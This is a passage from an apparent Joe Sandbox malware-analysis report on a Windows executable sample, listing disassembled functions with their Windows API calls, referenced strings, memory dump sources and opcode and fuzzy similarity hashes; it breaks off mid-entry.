Function 007078F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00708D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0070790A,?,000000FF,?,00708754,00000000,?,0000001C,?,?), ref: 00708D8C
Part of subcall function 00708D7D: lstrcpyW.KERNEL32(00000000,?,?,0070790A,?,000000FF,?,00708754,00000000,?,0000001C,?,?,00000000), ref: 00708DB2
Part of subcall function 00708D7D: lstrcmpiW.KERNEL32(00000000,?,0070790A,?,000000FF,?,00708754,00000000,?,0000001C,?,?), ref: 00708DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00708754,00000000,?,0000001C,?,?,00000000), ref: 00707923
lstrcpyW.KERNEL32(00000000,?,?,00708754,00000000,?,0000001C,?,?,00000000), ref: 00707949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00708754,00000000,?,0000001C,?,?,00000000), ref: 00707984

Strings

cdecl, xrefs: 0070797B

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 181bcc2d271513238e482ff255257f7a950265715c241d9c223a99e761ead392
Instruction ID: 47fd2a87b9569087bb9e9c2e2e788ca8307d7e5a93c8a292569384b0e11c4ccc
Opcode Fuzzy Hash: 181bcc2d271513238e482ff255257f7a950265715c241d9c223a99e761ead392
Instruction Fuzzy Hash: FE11067A200201FBDB159F34CC45D7A77E9FF45350B40812AF842C72A4EB35E811D7A5

Function 00735660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 007356BB
_wcslen.LIBCMT ref: 007356CD
_wcslen.LIBCMT ref: 007356D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00735816

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: bebd82aaa0bf223948b3a62562141dc5dfa0012a8ca5850f4c81a16f2561ce4f
Instruction ID: 9c704c9eed9cba8f5d431a18e6198f7185fd956a3670c77bc493d6df45b8825d
Opcode Fuzzy Hash: bebd82aaa0bf223948b3a62562141dc5dfa0012a8ca5850f4c81a16f2561ce4f
Instruction Fuzzy Hash: C211B171600618D6EB20DF658C86EEE77ACEF11760F50806AF915D6082EB789A80CB64

Function 00701A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00701A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00701A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00701A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00701A8A

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1c09a6e8f8573bf0e7d5959e8d3b8d8193f8266cf4bb6d7cb891fbf6730bacc1
Instruction ID: 07875626d4c2c0a5c067c9373627ac1f45355e87ff86866b07fa087b240981ca
Opcode Fuzzy Hash: 1c09a6e8f8573bf0e7d5959e8d3b8d8193f8266cf4bb6d7cb891fbf6730bacc1
Instruction Fuzzy Hash: BC11277AA01219FFEB11DBA4CD85FADBBB8EB08750F204191EA00B7290D6716E50DB94

Function 0070E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0070E1FD
MessageBoxW.USER32(?,?,?,?), ref: 0070E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0070E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0070E24D

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: b7f8cb10388a9bfeb79fb6767a3a494d74b205f675169eb3daccc901065b7d07
Instruction ID: 677e0c96268b3ac1ab7e6fc497e1ce76bf1ceafbefd9fcc5e74b21e40d18c65d
Opcode Fuzzy Hash: b7f8cb10388a9bfeb79fb6767a3a494d74b205f675169eb3daccc901065b7d07
Instruction Fuzzy Hash: 3D110872904218BBD7019BAC9C09AAE7FACEB45355F008719F914E32D0D278C90087A5

Function 006CD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,006CCFF9,00000000,00000004,00000000), ref: 006CD218
GetLastError.KERNEL32 ref: 006CD224
__dosmaperr.LIBCMT ref: 006CD22B
ResumeThread.KERNEL32(00000000), ref: 006CD249

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 7e2b4f74ebeca40e609a52cb6a36393b4a376e25e46ba7e7a199bcf6014047ca
Instruction ID: a9ba343605694bdd57d1f714f1e1bde960490ec77ed3be5f4be23de069d13b74
Opcode Fuzzy Hash: 7e2b4f74ebeca40e609a52cb6a36393b4a376e25e46ba7e7a199bcf6014047ca
Instruction Fuzzy Hash: CF01D276805208BBDB215BA5DC09FFA7A6FDF81331F20422DFA25922D0CB75CA01D7A5

Function 006A600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006A604C
GetStockObject.GDI32(00000011), ref: 006A6060
SendMessageW.USER32(00000000,00000030,00000000), ref: 006A606A

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 5ea2ad4a1915ea601ca66d4db86ece266ade7542b7199030d30dfa3f09aa92b0
Instruction ID: ab184efe63ce1a2bab8293ef35adbb6ad91f23feb617a32087b4c7560d529f16
Opcode Fuzzy Hash: 5ea2ad4a1915ea601ca66d4db86ece266ade7542b7199030d30dfa3f09aa92b0
Instruction Fuzzy Hash: 7211AD72101548BFEF125FA4CD44EEABB6AEF093A5F084205FA1462120C7369CA0EFA0

Function 006C3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 006C3B56

Part of subcall function 006C3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 006C3AD2
Part of subcall function 006C3AA3: ___AdjustPointer.LIBCMT ref: 006C3AED

_UnwindNestedFrames.LIBCMT ref: 006C3B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 006C3B7C
CallCatchBlock.LIBVCRUNTIME ref: 006C3BA4

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 55cb905d6de44418e566d85ad83751043889f8ca63a1a9611b40e0da82845818
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 60011732100148BBDF129E95CC42EEB3B6EEF58754F04801CFE4896221C632E9619BA4

Function 006D3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,006A13C6,00000000,00000000,?,006D301A,006A13C6,00000000,00000000,00000000,?,006D328B,00000006,FlsSetValue), ref: 006D30A5
GetLastError.KERNEL32(?,006D301A,006A13C6,00000000,00000000,00000000,?,006D328B,00000006,FlsSetValue,00742290,FlsSetValue,00000000,00000364,?,006D2E46), ref: 006D30B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,006D301A,006A13C6,00000000,00000000,00000000,?,006D328B,00000006,FlsSetValue,00742290,FlsSetValue,00000000), ref: 006D30BF

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: e597fe5e62e06e562f9e0594dfd7d4fae314687b7264613e4546f391bcba642b
Instruction ID: edd2abc9aee5fe55d9f69aba9c4503bcc2604d87a9ae14280b7b4d9d1dd34b29
Opcode Fuzzy Hash: e597fe5e62e06e562f9e0594dfd7d4fae314687b7264613e4546f391bcba642b
Instruction Fuzzy Hash: 30012B32B01332ABDB314B78AC449977B9AAF45BA1B144621F905F3340C725D901C7E5

Function 00707464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0070747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00707497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007074AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 007074CA

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 6d1567be12768acec095c2abfc6ca679bb89b66d0e84741a46ab2091b8faa430
Instruction ID: f20017c2cd0a21f5da66b260f78f5a117a39ab113914098605e7c7b22555c907
Opcode Fuzzy Hash: 6d1567be12768acec095c2abfc6ca679bb89b66d0e84741a46ab2091b8faa430
Instruction Fuzzy Hash: E211ADB5A05394EBF7208F14EC08B927FFCEB00B14F108669B656E6191D7B8F904DB60

Function 0070B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0070ACD3,?,00008000), ref: 0070B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0070ACD3,?,00008000), ref: 0070B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0070ACD3,?,00008000), ref: 0070B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0070ACD3,?,00008000), ref: 0070B126

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: a9fb99f5097d2894675ade070509fc051c3149b9fbc73718ef788bd10052e62c
Instruction ID: 0b2c0422e17d6ef115876d7dc00a661382cb1836530c4f3ca71b4c57bceff1bb
Opcode Fuzzy Hash: a9fb99f5097d2894675ade070509fc051c3149b9fbc73718ef788bd10052e62c
Instruction Fuzzy Hash: CC118471C0151CD7DF009FE4D9596EEBFB8FF09711F108185D941B2181CB385A50DB55

Function 00702DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00702DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00702DD6
GetCurrentThreadId.KERNEL32 ref: 00702DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00702DE4

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 8212fda1a2ff21b1d632b69b5ab4c4a5551e28113e5fe18a940c64bb2e3f6dea
Instruction ID: 02bfa9d0bdbf2e4fe957939f8c9f060981df0cff9d479c62a1d2a538034b92a0
Opcode Fuzzy Hash: 8212fda1a2ff21b1d632b69b5ab4c4a5551e28113e5fe18a940c64bb2e3f6dea
Instruction Fuzzy Hash: 2EE09272201224FBEB211B729C0FFEB3EACEF42BA2F004115F105E10819AA8C841C7B1

Function 00738863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 006B9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 006B9693
Part of subcall function 006B9639: SelectObject.GDI32(?,00000000), ref: 006B96A2
Part of subcall function 006B9639: BeginPath.GDI32(?), ref: 006B96B9
Part of subcall function 006B9639: SelectObject.GDI32(?,00000000), ref: 006B96E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00738887
LineTo.GDI32(?,?,?), ref: 00738894
EndPath.GDI32(?), ref: 007388A4
StrokePath.GDI32(?), ref: 007388B2

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 0c5e8b587a6ed49cd5ae2d23818e9cb5e35bfbce6b9f63c52e6a763fa4a63347
Instruction ID: 8eec4a073444d2d3fff57d012b1bbc74a0a9df9a9f22f90607adb9cee09bdd28
Opcode Fuzzy Hash: 0c5e8b587a6ed49cd5ae2d23818e9cb5e35bfbce6b9f63c52e6a763fa4a63347
Instruction Fuzzy Hash: FBF03A36045698BAEB135FA8AC09FCA3B69AF06311F44C000FB12751E2C7795551DFA9

Function 006B98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 006B98CC
SetTextColor.GDI32(?,?), ref: 006B98D6
SetBkMode.GDI32(?,00000001), ref: 006B98E9
GetStockObject.GDI32(00000005), ref: 006B98F1

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 2a41c673396df09ed3783340c870f523bb16b5ead75e28fb3f5589f167298d88
Instruction ID: 04af1a20d3a586305edd793162be9faf7095f4bed8262a695bf49f33e2f2e153
Opcode Fuzzy Hash: 2a41c673396df09ed3783340c870f523bb16b5ead75e28fb3f5589f167298d88
Instruction Fuzzy Hash: 1EE06571244248AAEB225B74AC09BE83F51AB11336F14C219F7F5641E1C77646509B10

Function 0070162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00701634
OpenThreadToken.ADVAPI32(00000000,?,?,?,007011D9), ref: 0070163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,007011D9), ref: 00701648
OpenProcessToken.ADVAPI32(00000000,?,?,?,007011D9), ref: 0070164F

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 50767dcca5e92bfe05ae0758b8a23f5a84c848f36bd1bd2bf3aafd09a7d2f003
Instruction ID: 7dc8b0f16886b695d5dd9cba436ebc7a642361c0cc47068848f1b66d2a0d3002
Opcode Fuzzy Hash: 50767dcca5e92bfe05ae0758b8a23f5a84c848f36bd1bd2bf3aafd09a7d2f003
Instruction Fuzzy Hash: FBE08C72602211EBE7201FA0AE0DB873BBCAF44793F14C808F245E9080EB3D8444CB68

Function 006FD858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 006FD858
GetDC.USER32(00000000), ref: 006FD862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 006FD882
ReleaseDC.USER32(?), ref: 006FD8A3

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 3ece94bd57b17d5a8f4072df4cf53a6f6cdbcd7a45fc5fca08de0bf7cc6a66de
Instruction ID: f5f5fc4ad36d06a530f72a7a13abaae68169aff388d09403a812d63e302e9392
Opcode Fuzzy Hash: 3ece94bd57b17d5a8f4072df4cf53a6f6cdbcd7a45fc5fca08de0bf7cc6a66de
Instruction Fuzzy Hash: 24E01AB1800204EFDB42AFA0D80D66DBBB2FB08312F10C009F946F7260C73D9942AF44

Function 006FD86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 006FD86C
GetDC.USER32(00000000), ref: 006FD876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 006FD882
ReleaseDC.USER32(?), ref: 006FD8A3

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 33a6034bc7d28313913e6f958dd6ec4f833f5941a7932fce9e9c97da1c2eef1c
Instruction ID: 06053dd8a283a46042be5f26486f9f8030e6ca08c2904ad3db02b4296109c6cc
Opcode Fuzzy Hash: 33a6034bc7d28313913e6f958dd6ec4f833f5941a7932fce9e9c97da1c2eef1c
Instruction Fuzzy Hash: FAE01AB1800200DFDB42AFA0D80D66DBBB2BB08312F108008F946F7260C73D99019F44

Function 00714D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 006A7620: _wcslen.LIBCMT ref: 006A7625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00714ED4

Strings

LPT, xrefs: 00714DFB
*, xrefs: 00714E10

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 99adfc999786badfdc1bb7b82f784dcaecd61cd71b5cd97843932cb98e709560
Instruction ID: 380d792099f740d35a200d0cdd7255964960e6ab881e309ca01922026dbfb50d
Opcode Fuzzy Hash: 99adfc999786badfdc1bb7b82f784dcaecd61cd71b5cd97843932cb98e709560
Instruction Fuzzy Hash: E2914F75A002049FDB14DF58C484EA9BBF5BF49314F19809DE80A9F3A2D735EE86CB91

Function 006CE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 006CE30D

Strings

pow, xrefs: 006CE2E5, 006CE302

